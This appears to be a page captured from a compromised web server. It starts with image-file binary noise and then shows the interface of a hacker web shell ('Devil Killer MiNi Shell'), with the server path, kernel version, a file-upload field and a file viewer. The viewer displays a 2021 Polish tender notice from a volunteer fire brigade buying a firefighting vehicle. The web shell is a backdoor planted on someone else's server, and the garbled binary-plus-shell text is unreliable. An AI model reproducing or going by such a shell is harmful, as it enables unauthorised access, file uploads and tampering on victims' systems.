JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210723/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210723/0012456702-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00124567 z dnia 2021-07-23</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Dostawa średniego samochodu ratowniczo-gaśniczego na <br/>potrzeby Ochotniczej Straży Pożarnej w Łoniowej” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">OCHOTNICZA STRAŻ POŻARNA W ŁONIOWEJ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 851753500</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">N/N</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łoniowa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-854</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL217 - Tarnowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">603269035</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">osploniowa21@gmail.com</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.facebook.com/OSP-KSRG-%C5%81oniowa-912223432165519/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - osoba prawna, o której mowa w art. 4 pkt 3 ustawy (podmiot prawa publicznego)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> ochrona przeciwpożarowa </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Dostawa średniego samochodu ratowniczo-gaśniczego na <br/>potrzeby Ochotniczej Straży Pożarnej w Łoniowej” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-60127112-eb7e-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00124567</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">02</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00123415/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawa średniego samochodu ratowniczo-gaśniczego na potrzeby Ochotniczej Straży Pożarnej w Łoniowej.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia i w konkursie, w tym składanie ofert, <br/>wniosków o dopuszczenie do udziału w postępowaniu lub konkursie, wymiana informacji oraz <br/>przekazywanie dokumentów lub oświadczeń między zamawiającym a wykonawcą, z <br/>uwzględnieniem wyjątków określonych w ustawie p.z.p., odbywa się przy użyciu środków <br/>komunikacji elektronicznej. Przez środki komunikacji elektronicznej rozumie się środki <br/>komunikacji elektronicznej zdefiniowane w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług <br/>drogą elektroniczną (Dz. U. z 2020 r. poz. 344 z późn. zm.).<br/>2. W przedmiotowym postępowaniu komunikacja między Zamawiającym a Wykonawcami odbywa <br/>się drogą elektroniczną przy użyciu:<br/>1) miniPortalu dostępnego pod adresem: https://miniportal.uzp.gov.pl/, <br/>2) ePUAPu https://epuap.gov.pl/wps/portal; adres skrytki /debno/skrytka<br/>3) poczty elektronicznej: osploniowa21@gmail.com<br/>3. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie Zamówienia publicznego, <br/>musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do <br/>formularzy: złożenia, zmiany, wycofania oferty lub wniosku oraz do formularza do <br/>komunikacji.<br/>4. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, <br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przy ich użyciu opisane zostały <br/>w Regulaminie korzystania z mini portalu oraz Regulaminie ePUAP.<br/>5. Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego, <br/>akceptuje warunki korzystania z miniPortalu, określone w Regulaminie miniPortalu oraz <br/>zobowiązuje się korzystając z miniPortalu przestrzegać postanowień tego regulaminu.<br/>6. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do: <br/>złożenia i wycofania oferty oraz do komunikacji wynosi 150 MB.<br/>7. Za datę przekazania oferty, oświadczenia, o którym mowa w art. 125 ust. 1 ustawy Pzp, <br/>podmiotowych środków dowodowych, przedmiotowych środków dowodowych oraz innych <br/>informacji, oświadczeń lub dokumentów, przekazywanych w postępowaniu, przyjmuje się datę <br/>ich przekazania na ePUAP .<br/>8. Zamawiający przekazuje link do postępowania oraz Identyfikator postępowania - ID <br/>postępowania jako załącznik nr 10 do niniejszej SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 <br/>kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i <br/>w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/>rozporządzenie o danych) (Dz. U. UE L119 z dnia 4 maja 2016 r., str. 1; zwanym dalej „RODO”) <br/>informujemy, że:<br/>1) administratorem Pani/Pana danych osobowych jest Prezes Ochotniczej Straży Pożarnej w <br/>Łoniowej, 32-854 Porąbka Uszewska, Łoniowa 42, adres e-mail: osploniowa21@gmail.com<br/>2) w zakresie przetwarzania danych osobowych może Pan/Pani kontaktować się z <br/>administratorem danych osobowych – Prezesem OSP w Łoniowej, osploniowa21@gmail.com<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu <br/>związanym z przedmiotowym postępowaniem o udzielenie zamówienia publicznego, <br/>prowadzonym w trybie podstawowym.<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona <br/>zostanie dokumentacja postępowania w oparciu o art.18 i 74 ustawy P.Z.P.<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 P.Z.P. przez okres 4 <br/>lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy <br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy;<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana <br/>dotyczących jest wymogiem ustawowym określonym w przepisanych ustawy P.Z.P., <br/>związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego.<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób <br/>zautomatyzowany, stosownie do art. 22 RODO.<br/>8) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących<br/>(w przypadku, gdy skorzystanie z tego prawa wymagałoby po stronie administratora <br/>niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania Strona 3 z 21<br/>dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności <br/>podania nazwy lub daty postępowania o udzielenie zamówienia publicznego lub konkursu <br/>albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie <br/>zamówienia);<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych <br/>(skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania <br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie <br/>niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu oraz jego <br/>załączników);<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania <br/>danych osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie <br/>zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 <br/>RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do <br/>przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu <br/>ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu <br/>publicznego Unii Europejskiej lub państwa członkowskiego);<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna <br/>Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy <br/>RODO;</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OSP.271.1.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa fabrycznie nowego nie starszego niż z 2021 r. średniego <br/>samochodu ratowniczo-gaśniczego na podwoziu z napędem 4x4 (zabudowa kontenerowa)+ <br/>autopompa spalinowa. <br/>Szczegółowy opis przedmiotu zamówienia podający wyposażenie, parametry oraz warunki <br/>gwarancji pojazdu został określony przez Zamawiającego w załączniku Nr 9 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34144210-3 - Wozy strażackie</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">35110000-8 - Sprzęt gaśniczy, ratowniczy i bezpieczeństwa</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie kierował się następującymi kryteriami:<br/>Nazwa kryterium Waga<br/>Cena (C) 60%<br/>Okres gwarancji i rękojmi <br/>na zabudowę (G) <br/>40%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">„okres gwarancji i rękojmi na zabudowę”</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na <br/>zasadach określonych w Rozdziale VIII SWZ, oraz spełniają określone przez Zamawiającego <br/>warunki udziału w postępowaniu.<br/>2. Zamawiający określa następujące warunki udziału w postępowaniu dotyczące:<br/>1) Zdolność do występowania w obrocie gospodarczym;<br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie <br/>Wykonawca byłby zobowiązany wykazać w sposób szczególny.<br/>2) Uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej , o ile <br/>wynika to z odrębnych przepisów;<br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie <br/>Wykonawca byłby zobowiązany wykazać w sposób szczególny.<br/>3) Sytuacji ekonomicznej lub finansowej Strona 7 z 21<br/>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie <br/>Wykonawca byłby zobowiązany wykazać w sposób szczególny.<br/>4) Zdolności technicznej lub zawodowej. Wykonawca spełni warunek jeżeli wykaże:<br/>Na potwierdzenie spełniania warunku Wykonawca wykaże, że wykonał należycie nie wcześniej <br/>niż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia <br/>działalności jest krótszy - w tym okresie minimum 1 dostawę polegającą na dostawie <br/>średniego samochodu ratowniczo – gaśniczego z napędem 4x4.<br/>3. Zamawiający może na każdym etapie postępowania, uznać, że wykonawca nie posiada <br/>wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w <br/>szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne <br/>przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację <br/>zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Potwierdzających brak podstaw wykluczenia:<br/>a) oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku <br/>przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego <br/>2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 ze zm.), z <br/>innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o <br/>dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej <br/>samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi <br/>przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w <br/>postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy <br/>kapitałowej zgodnie z załącznikiem nr 7 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) Wykaz dostaw wykonanych, a w przypadku świadczeń powtarzających się lub <br/>ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia <br/>działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat <br/>wykonania i podmiotów, na rzecz których dostawy zostały wykonane lub są wykonywane, <br/>oraz załączeniem dowodów określających, czy te dostawy zostały wykonane lub są <br/>wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne <br/>dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane, a w <br/>przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli <br/>wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych <br/>dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub <br/>ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich <br/>należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy; zgodnie <br/>z załącznikiem nr 8 do SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Na potwierdzenie, że oferowana przez Wykonawcę dostawa samochodu spełnia określone przez <br/>Zamawiającego w SWZ wymagania Wykonawca zobowiązany jest do złożenia wraz z ofertą <br/>następujących przedmiotowych środków dowodowych: <br/>5.1. Wypełniony przez Wykonawcę załącznik nr 1A do SWZ tj. oświadczenie Wykonawcy <br/>zawierające zestawienie parametrów technicznych i wyposażenia oferowanego przedmiotu <br/>zamówienia. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Wypełniony przez Wykonawcę załącznik nr 1A do SWZ tj. oświadczenie Wykonawcy <br/>zawierające zestawienie parametrów technicznych i wyposażenia oferowanego przedmiotu <br/>zamówienia. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. W przypadku wspólnego ubiegania się o udzielenie zamówienia wykonawcy ustanawiają <br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo <br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego – nie <br/>dotyczy spółki cywilnej o ile upoważnienie/ pełnomocnictwo do występowania w imieniu spółki <br/>wynika z dołączonej do oferty umowy spółki, bądź wszyscy wspólnicy podpiszą ofertę.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia przedłożą wraz z ofertą stosowne <br/>pełnomocnictwo. <br/>4. Wszelka korespondencja kierowana będzie wyłącznie do podmiotu występującego jako <br/>pełnomocnik<br/>5. Wykonawcy wspólnie ubiegający się o zamówienia ponoszą solidarną odpowiedzialność za <br/>wykonanie umowy.Strona 12 z 21<br/>6. W przypadku wspólnego ubiegania się o udzielenie zamówienia przez Wykonawców, oświadczenie <br/>o niepodleganiu wykluczeniu oraz spełnieniu warunków udziału w postępowaniu o którym mowa w <br/>art. 125 ust. 1 ustawy Pzp składa każdy z Wykonawców wspólnie ubiegających się o udzielenie <br/>zamówienia. Oświadczenia te potwierdzają spełnienie warunków udziału w postępowaniu oraz <br/>brak podstaw wykluczenia. Ponadto każdy z wykonawców składa oświadczenie o którym mowa w <br/>rozdz.IX ust. 2 pkt 1 lit. a niniejszej SWZ.<br/>7. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub <br/>doświadczenia wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na <br/>zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji <br/>których te zdolności są wymagane. W takim przypadku Wykonawcy wspólnie ubiegający się o <br/>udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty <br/>budowlane/dostawy/usługi wykonają poszczególni Wykonawcy zgodnie z załącznikiem nr 6 do <br/>SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty <br/>w zakresie uregulowanym w art. 454-455 p.z.p. oraz wskazanym we Wzorze Umowy, stanowiącym <br/>Załącznik nr 2 do SWZ.<br/>4. Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy <br/>pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, 